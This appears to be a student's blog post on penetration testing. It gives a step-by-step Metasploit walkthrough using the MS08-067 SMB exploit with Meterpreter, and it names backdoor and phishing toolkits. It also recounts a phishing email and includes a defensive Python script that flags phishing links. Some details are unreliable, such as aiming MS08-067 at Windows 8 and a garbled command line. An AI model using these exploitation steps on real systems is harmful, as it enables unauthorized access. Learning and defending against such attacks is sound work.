Maintaining Access

One of the most important phases of penetration testing is maintaining access. Once an ethical hacker has gained access to the target, he or she must keep that access long enough to accomplish the objectives of the engagement. What I learned last week is that locating the vulnerabilities and exploiting the target is not the end: there is a further phase in which access to the system has to be kept or re-established. There are many ways to do this, such as planting a backdoor or escalating privileges to gain more control over the system. Recently I found that Metasploit is a really great tool for this. Other tools I found useful on the internet are web shells, PowerSploit and Weevely.

Target Exploitation

Target exploitation is one of the most important phases of a penetration test. It focuses on establishing access to a system by bypassing its security restrictions. An exploit itself is a piece of software or a sequence of commands that takes advantage of a particular vulnerability, which is a weakness in the system. Although exploits can be delivered in a variety of ways, one of the most common is launching them from malicious websites. The victim may visit such a website by accident, or may be tricked into clicking a link to it in a phishing email or a malicious advertisement. Target exploitation can be done using Metasploit; the steps are below.

1. Create a new IP address on the interface
– ifconfig (interface) (IPAddress) (subnetMask)
– sudo (interface) (ipAddress) (subnetMask) | to check only
2. Check connectivity with the target by pinging it
– ping (target IPAddress)
3. Start Metasploit
– msfconsole
4. In this case, we try Windows 8
– use windows/smb/ms08_067_netapi | selects the exploit module for the target
5. Check whether LHOST and RHOST are set
– show options
6. set LHOST (our IPAddress)
7. set RHOST (target’s IPAddress)
8. set PAYLOAD
9. exploit

Lastly, using Meterpreter I could run a lot of commands such as shutdown, reboot and screenshot, and do other things remotely from my own machine.

Social Engineering

Social engineering is a technique that manipulates a person’s psychology to obtain one or more pieces of information by deceiving them, without them knowing our main goal, which is to get personal or crucial information from them.

Nowadays, one of the techniques most often used in social engineering is phishing. Phishing is a cybercrime in which the attacker sends the target an email, telephone call or text message, often posing as a legitimate institution, to lure the target into clicking a link provided by the attacker. The target then hands over sensitive data such as email addresses, passwords, and banking and credit card details. The attacker uses this information to access the target’s account and, of course, then has 100% control over that account.

Tools:

  • Social Engineering Toolkit (SET)
  • Gophish
  • SocialFish

Recently, my sister got a suspicious email from the Apple company through her Yahoo email. She realized that the email was suspicious when she saw the From field of the email. See the picture below.

In the picture above, the sender’s email address is just too random and very suspicious: how can a company like Apple have an email address at 888bestdeals.com? So she thought it was not from the official Apple company. But to make sure it was really fake, she forwarded the email to me to ask whether it was a real email or a phishing email. Thanks to my teacher, I knew I could tell whether an email is real or fake by moving my mouse cursor over the link. Although the sender may use a phishing link that looks the same as the real Apple link, sometimes it is just a fake made with an href styled in blue and underlined like a real link. So to check whether it was real, I moved my mouse cursor over the link.

Surprisingly, the attacker used another fake link made with a URL shortener such as bit.ly. When I checked it using VirusTotal, of course the result was as in the picture below:

Because the URL is based on bit.ly, virustotal.com reports that the URL is clean.

So there was no other way to check it with virustotal.com except by visiting the phishing link itself. I have no screenshot of the phishing page because the website has already been shut down. But since I had the final URL, I copied and pasted it into virustotal.com, and I found out that it was a phishing link.
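The two checks described above (the sender’s address not belonging to the brand it claims, and the visible link text not matching where the href actually points, including hiding the destination behind a URL shortener) can be automated over an email’s HTML body. The following script is an added example written for this post, not a tool from the post itself; the message it analyses is a constructed sample in the same style as the one described, and the list of shortener domains and the brand domain to compare against are assumptions you would adjust for your own mail.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample message (not the real email from the post): the From
# header claims to be Apple but uses an unrelated domain, and the first link's
# visible text shows an Apple URL while the href goes through a shortener.
SAMPLE_FROM = "Apple Support <billing@888bestdeals.com>"
SAMPLE_HTML = """
<p>Your Apple ID has been locked. Please verify your account:</p>
<a href="https://bit.ly/3xAmpLe">https://appleid.apple.com/verify</a>
<p>Or read our <a href="https://www.apple.com/legal/">terms</a>.</p>
"""

# Assumed list of common URL shorteners; extend it for your environment.
SHORTENERS = {"bit.ly", "tinyurl.com", "t.co", "goo.gl", "ow.ly", "is.gd"}


class LinkExtractor(HTMLParser):
    """Collects (visible_text, href) pairs for every <a> element in the body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append(("".join(self._text).strip(), self._href))
            self._href = None


def registrable_domain(host):
    """Simplification: keep the last two labels (wrong for co.uk-style suffixes)."""
    parts = host.lower().split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def sender_domain(from_header):
    """Domain after the '@' in a From header, or '' if none is present."""
    m = re.search(r"@([\w.-]+)", from_header)
    return m.group(1).lower() if m else ""


def host_of(text):
    """Hostname if the link text itself looks like a URL or domain, else ''."""
    candidate = text if "://" in text else "http://" + text
    host = urlparse(candidate).hostname or ""
    return host if re.fullmatch(r"[\w.-]+\.[a-z]{2,}", host) else ""


def analyse(from_header, html_body, claimed_brand_domain):
    """Return a list of human-readable findings; an empty list means no red flags."""
    findings = []
    sd = sender_domain(from_header)
    if registrable_domain(sd) != claimed_brand_domain:
        findings.append(f"sender domain {sd} does not match {claimed_brand_domain}")
    parser = LinkExtractor()
    parser.feed(html_body)
    for text, href in parser.links:
        href_host = urlparse(href).hostname or ""
        if registrable_domain(href_host) in SHORTENERS:
            findings.append(f"link uses URL shortener {href_host}, hiding the destination: {href}")
        text_host = host_of(text)
        if text_host and registrable_domain(text_host) != registrable_domain(href_host):
            findings.append(f"link text shows {text_host} but href points to {href_host}")
    return findings


if __name__ == "__main__":
    for finding in analyse(SAMPLE_FROM, SAMPLE_HTML, "apple.com"):
        print("FLAG:", finding)
```

Run as-is it prints three flags for the constructed sample: the sender domain mismatch, the shortener, and the link whose text shows appleid.apple.com while the href goes elsewhere. The second link (plain text "terms" pointing at apple.com) produces nothing, which is the point of comparing text against href rather than flagging every link. The domain comparison is deliberately crude; a real deployment would use the public suffix list.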

In conclusion, be careful with any email you receive. Always check the sender’s email address and the link given in that email.